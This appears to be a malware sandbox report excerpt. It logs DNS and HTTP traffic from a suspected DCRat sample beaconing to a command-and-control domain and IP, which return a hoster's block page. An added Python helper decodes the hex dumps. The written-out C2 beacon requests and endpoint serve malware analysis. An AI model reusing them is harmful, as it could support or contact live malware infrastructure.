                                  Sep 27, 2024 08:43:54.369868994 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.369920969 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.369954109 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.369986057 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.370012999 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.370018959 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.370054007 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.370057106 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.370109081 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.370863914 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.370897055 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.370946884 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.370980024 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.370980024 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.371014118 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.371049881 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.371066093 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.371104956 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.371825933 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.371877909 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.371912003 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.371942997 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.371962070 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.371978045 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.372011900 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.372030020 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.372067928 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.372746944 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.379983902 CEST4972080192.168.2.9141.8.194.149
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2024 08:42:22.505260944 CEST | 51210 | 53 | 192.168.2.9 | 1.1.1.1
Sep 27, 2024 08:42:22.598475933 CEST | 53 | 51210 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 27, 2024 08:42:22.505260944 CEST | 192.168.2.9 | 1.1.1.1 | 0xbf1e | Standard query (0) | a1025223.xsph.ru | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 27, 2024 08:42:22.598475933 CEST | 1.1.1.1 | 192.168.2.9 | 0xbf1e | No error (0) | a1025223.xsph.ru | | 141.8.194.149 | A (IP address) | IN (0x0001) | false
                                  • a1025223.xsph.ru
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49714 | 141.8.194.149 | 80 | 2156 | C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 08:42:22.643987894 CEST | 465 | OUT | GET /d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF HTTP/1.1
Accept: */*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: a1025223.xsph.ru
Connection: Keep-Alive
Sep 27, 2024 08:42:23.321708918 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Fri, 27 Sep 2024 06:42:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
                                  Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                                  Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
                                  Sep 27, 2024 08:42:23.321749926 CEST1236INData Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b
                                  Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-i
                                  Sep 27, 2024 08:42:23.321768045 CEST448INData Raw: 74 3a 37 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 77 72 61
                                  Data Ascii: t:700;font-size:38px;line-height:100%;margin-bottom:16px;white-space:pre-line}.wrapper .content .right-side{display:table}.wrapper .content .footer,.wrapper .content .right-side .image-container{display:-webkit-box;display:-webkit-flex;display
                                   Sep 27, 2024 08:42:23.321784019 CEST | 1236 | IN | Data Raw: 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74
                                  Data Ascii: -box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-align-content:center;-ms-flex-line-pack:center;align-content:center}.wrapper .content .footer__logo svg,.wrapper .content .right-side .image-container img{width:inherit;heigh
                                   Sep 27, 2024 08:42:23.321798086 CEST | 1236 | IN | Data Raw: 74 6f 6d 3a 35 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 36 31 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 31 30 35 70 78 29 20 61 6e 64 20 28 6d
                                  Data Ascii: tom:52px;position:absolute;right:61px}}@media screen and (max-width:1105px) and (max-height:720px){.wrapper .content .right-side{display:none}}@media screen and (max-width:1105px){.wrapper .content .right-side .image-container-xs{display:block
                                   Sep 27, 2024 08:42:23.321813107 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 74 69 74 6c 65 22 3e d0 a1 d0 b0 d0 b9 d1 82 20 d0 b7 d0 b0 d0 b1 d0 bb d0 be d0 ba d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd 3c 2f 68 31
                                   Data Ascii: <h1 class="error-block__title">Сайт заблокирован</h1> <p class="error-block__desc">, </p> </div> </div>
                                   Sep 27, 2024 08:42:23.321827888 CEST | 1236 | IN | Data Raw: 2e 36 30 32 20 39 38 2e 32 37 39 39 20 31 36 38 2e 35 35 39 20 39 36 2e 33 37 30 34 20 31 36 39 2e 35 31 35 20 39 34 2e 38 34 32 38 43 31 36 39 2e 38 39 38 20 39 34 2e 32 37 20 31 37 30 2e 32 38 20 39 33 2e 38 38 38 31 20 31 37 30 2e 36 36 33 20
                                  Data Ascii: .602 98.2799 168.559 96.3704 169.515 94.8428C169.898 94.27 170.28 93.8881 170.663 93.3152C171.619 91.9786 172.767 90.6419 173.149 88.9234C173.34 87.7777 172.575 87.2048 172.193 87.0139C171.428 86.441 170.471 86.632 169.706 87.0139C168.75 87.58
                                   Sep 27, 2024 08:42:23.321844101 CEST | 328 | IN | Data Raw: 32 38 2e 39 36 37 20 39 37 2e 35 31 36 31 43 31 33 32 2e 36 30 31 20 39 36 2e 33 37 30 34 20 31 33 36 2e 32 33 35 20 39 35 2e 34 31 35 37 20 31 33 39 2e 36 37 38 20 39 34 2e 32 37 43 31 34 30 2e 36 33 34 20 39 33 2e 38 38 38 31 20 31 34 30 2e 32
                                  Data Ascii: 28.967 97.5161C132.601 96.3704 136.235 95.4157 139.678 94.27C140.634 93.8881 140.251 92.1695 139.104 92.3605Z" fill="black"/> <path d="M196.866 87.9678C193.232 87.5859 189.598 87.5859 186.155 87.5859C185.008 87.5859 185.008 89.4954 186
                                   Sep 27, 2024 08:42:23.321857929 CEST | 1236 | IN | Data Raw: 39 2e 34 39 35 34 20 31 39 37 2e 38 32 32 20 38 38 2e 39 32 32 36 43 31 39 37 2e 38 32 32 20 38 38 2e 33 34 39 37 20 31 39 37 2e 34 34 20 38 37 2e 39 36 37 38 20 31 39 36 2e 38 36 36 20 38 37 2e 39 36 37 38 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63
                                  Data Ascii: 9.4954 197.822 88.9226C197.822 88.3497 197.44 87.9678 196.866 87.9678Z" fill="black"/> <path d="M199.352 96.3699C195.718 94.8423 191.893 93.3147 188.259 91.7871C187.876 91.5962 187.303 91.9781 187.111 92.36C186.92 92.9328 187.303 93.31
                                   Sep 27, 2024 08:42:23.321871996 CEST | 792 | IN | Data Raw: 32 33 2e 30 36 39 20 36 38 2e 38 37 34 32 43 32 32 37 2e 30 38 36 20 35 34 2e 35 35 33 20 32 33 35 2e 35 30 32 20 34 31 2e 35 36 38 33 20 32 33 37 2e 37 39 37 20 32 36 2e 36 37 34 32 43 32 33 38 2e 35 36 32 20 32 36 2e 32 39 32 33 20 32 33 38 2e
                                  Data Ascii: 23.069 68.8742C227.086 54.553 235.502 41.5683 237.797 26.6742C238.562 26.2923 238.753 25.1466 237.797 24.9557C226.703 22.6643 215.419 25.5285 205.282 29.9204C199.926 32.2118 194.762 34.8851 189.598 37.3674C184.625 39.8498 179.461 42.3321 174.1
                                   Sep 27, 2024 08:42:23.341792107 CEST | 1236 | IN | Data Raw: 34 30 36 36 20 35 33 2e 30 32 35 34 20 35 38 2e 30 30 37 35 20 35 33 2e 39 38 30 31 43 35 37 2e 32 34 32 34 20 35 34 2e 31 37 31 31 20 35 37 2e 30 35 31 32 20 35 35 2e 31 32 35 38 20 35 37 2e 36 32 35 20 35 35 2e 35 30 37 37 43 36 33 2e 33 36 32
                                  Data Ascii: 4066 53.0254 58.0075 53.9801C57.2424 54.1711 57.0512 55.1258 57.625 55.5077C63.3629 61.4272 69.1009 67.3466 75.0301 73.2661C80.1943 78.4217 85.5497 83.1955 91.6702 87.2055C94.7304 89.115 97.9819 90.8335 101.425 92.1702C103.146 102.481 105.059
                                   Sep 27, 2024 08:42:23.572715998 CEST | 441 | OUT | GET /d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF HTTP/1.1
                                  Accept: */*
                                  Content-Type: application/json
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                  Host: a1025223.xsph.ru
                                   Sep 27, 2024 08:42:23.780380964 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Fri, 27 Sep 2024 06:42:23 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Vary: Accept-Encoding
                                  Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                                   Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Ошибка 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
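Reading the "Data Raw" column rather than "Data Ascii" matters for these responses: the ASCII rendering silently drops every non-ASCII byte, so the block page appears as an empty `<title> 4030</title>` and an empty `<h1>`, while the raw bytes are UTF-8 for "Ошибка 4030" ("Error 4030") and "Сайт заблокирован" ("Site blocked"). The leading `dfbe\r\n` is not page content either; it is the chunk-size line of the `Transfer-Encoding: chunked` body (0xdfbe = 57278 bytes declared for the first chunk). The Python helper below is an added example written for this page, not code from the Joe Sandbox report or from the DCRat sample. Its two hex excerpts are copied from the "Data Raw" cells above; the `<h1>` fragment is cut off at `3c 2f 68 31` in the report, so a closing `3e` (`>`) is appended here.

```python
import re
from html import unescape

# Hex excerpts copied from the report's "Data Raw" cells. The second one is
# truncated at "3c 2f 68 31" in the report; the trailing "3e" (">") is added here.
RAW_FIRST_CHUNK = (
    "64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c "
    "20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 "
    "61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 "
    "6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 "
    "3e 0a"
)
RAW_H1_FRAGMENT = (
    "3c 68 31 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 74 69 74 "
    "6c 65 22 3e d0 a1 d0 b0 d0 b9 d1 82 20 d0 b7 d0 b0 d0 b1 d0 bb d0 be d0 ba d0 b8 "
    "d1 80 d0 be d0 b2 d0 b0 d0 bd 3c 2f 68 31 3e"
)


def raw_to_bytes(cell: str) -> bytes:
    """Convert the space-separated hex of a 'Data Raw' cell back into bytes."""
    return bytes.fromhex(cell)


def split_chunk_header(body: bytes):
    """Split the '<hexsize>\\r\\n' line that opens a chunked HTTP body.
    Returns (declared_size, payload), or (None, body) if no chunk header is present."""
    m = re.match(rb"([0-9A-Fa-f]{1,8})\r\n", body)
    if m is None:
        return None, body
    return int(m.group(1), 16), body[m.end():]


def ascii_view(data: bytes) -> str:
    """What the report's 'Data Ascii' column shows: non-ASCII bytes are dropped."""
    return data.decode("ascii", errors="ignore")


def utf8_view(data: bytes) -> str:
    """The same bytes decoded as the page itself declares (meta charset=UTF-8)."""
    return data.decode("utf-8", errors="replace")


def tag_text(html: str, tag: str):
    """Text of the first <tag>...</tag> element in html, or None if absent."""
    m = re.search(rf"<{tag}\b[^>]*>(.*?)</{tag}>", html, re.S)
    return unescape(m.group(1)).strip() if m else None


def summarize_block_page(first_chunk_cell: str, h1_cell: str) -> dict:
    """Decode both dump cells and report what the ASCII view lost."""
    size, payload = split_chunk_header(raw_to_bytes(first_chunk_cell))
    h1 = raw_to_bytes(h1_cell)
    return {
        "chunk_size": size,
        "title_ascii_view": tag_text(ascii_view(payload), "title"),
        "title_utf8": tag_text(utf8_view(payload), "title"),
        "h1_utf8": tag_text(utf8_view(h1), "h1"),
    }


if __name__ == "__main__":
    print(summarize_block_page(RAW_FIRST_CHUNK, RAW_H1_FRAGMENT))
```

The same two-step decode (strip the chunk-size line, then decode as the charset the page declares) applies to any chunked body in a Joe Sandbox HTTP dump; the title and heading are the quickest way to tell a hoster's block page from a real C2 reply when the status code alone is ambiguous.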


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   1 | 192.168.2.9 | 49715 | 141.8.194.149 | 80 | 5336 | C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Sep 27, 2024 08:42:44.088402987 CEST | 428 | OUT | GET /d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0 HTTP/1.1
                                  Accept: */*
                                  Content-Type: text/html
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                  Host: a1025223.xsph.ru
                                  Connection: Keep-Alive
                                   Sep 27, 2024 08:42:44.758685112 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Fri, 27 Sep 2024 06:42:44 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Vary: Accept-Encoding
                                  Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                                   Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Ошибка 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
                                   Sep 27, 2024 08:42:44.758759975 CEST | 1236 | IN | Data Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b
                                  Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-i
                                   Sep 27, 2024 08:42:44.758783102 CEST | 448 | IN | Data Raw: 74 3a 37 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 77 72 61
                                  Data Ascii: t:700;font-size:38px;line-height:100%;margin-bottom:16px;white-space:pre-line}.wrapper .content .right-side{display:table}.wrapper .content .footer,.wrapper .content .right-side .image-container{display:-webkit-box;display:-webkit-flex;display
                                   Sep 27, 2024 08:42:44.758800983 CEST | 1236 | IN | Data Raw: 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74
                                  Data Ascii: -box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-align-content:center;-ms-flex-line-pack:center;align-content:center}.wrapper .content .footer__logo svg,.wrapper .content .right-side .image-container img{width:inherit;heigh
                                   Sep 27, 2024 08:42:44.758816957 CEST | 1236 | IN | Data Raw: 74 6f 6d 3a 35 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 36 31 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 31 30 35 70 78 29 20 61 6e 64 20 28 6d
                                  Data Ascii: tom:52px;position:absolute;right:61px}}@media screen and (max-width:1105px) and (max-height:720px){.wrapper .content .right-side{display:none}}@media screen and (max-width:1105px){.wrapper .content .right-side .image-container-xs{display:block
                                   Sep 27, 2024 08:42:44.758833885 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 74 69 74 6c 65 22 3e d0 a1 d0 b0 d0 b9 d1 82 20 d0 b7 d0 b0 d0 b1 d0 bb d0 be d0 ba d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd 3c 2f 68 31
                                   Data Ascii: <h1 class="error-block__title">Сайт заблокирован</h1> <p class="error-block__desc">, </p> </div> </div>
                                   Sep 27, 2024 08:42:44.758852959 CEST | 672 | IN | Data Raw: 2e 36 30 32 20 39 38 2e 32 37 39 39 20 31 36 38 2e 35 35 39 20 39 36 2e 33 37 30 34 20 31 36 39 2e 35 31 35 20 39 34 2e 38 34 32 38 43 31 36 39 2e 38 39 38 20 39 34 2e 32 37 20 31 37 30 2e 32 38 20 39 33 2e 38 38 38 31 20 31 37 30 2e 36 36 33 20
                                  Data Ascii: .602 98.2799 168.559 96.3704 169.515 94.8428C169.898 94.27 170.28 93.8881 170.663 93.3152C171.619 91.9786 172.767 90.6419 173.149 88.9234C173.34 87.7777 172.575 87.2048 172.193 87.0139C171.428 86.441 170.471 86.632 169.706 87.0139C168.75 87.58
                                   Sep 27, 2024 08:42:44.758872986 CEST | 1236 | IN | Data Raw: 20 31 36 33 2e 32 30 33 20 31 30 31 2e 31 34 34 20 31 36 31 2e 38 36 34 20 31 30 31 2e 39 30 38 43 31 36 30 2e 39 30 38 20 31 30 32 2e 34 38 31 20 31 36 31 2e 36 37 33 20 31 30 34 2e 31 39 39 20 31 36 32 2e 38 32 31 20 31 30 33 2e 36 32 37 43 31
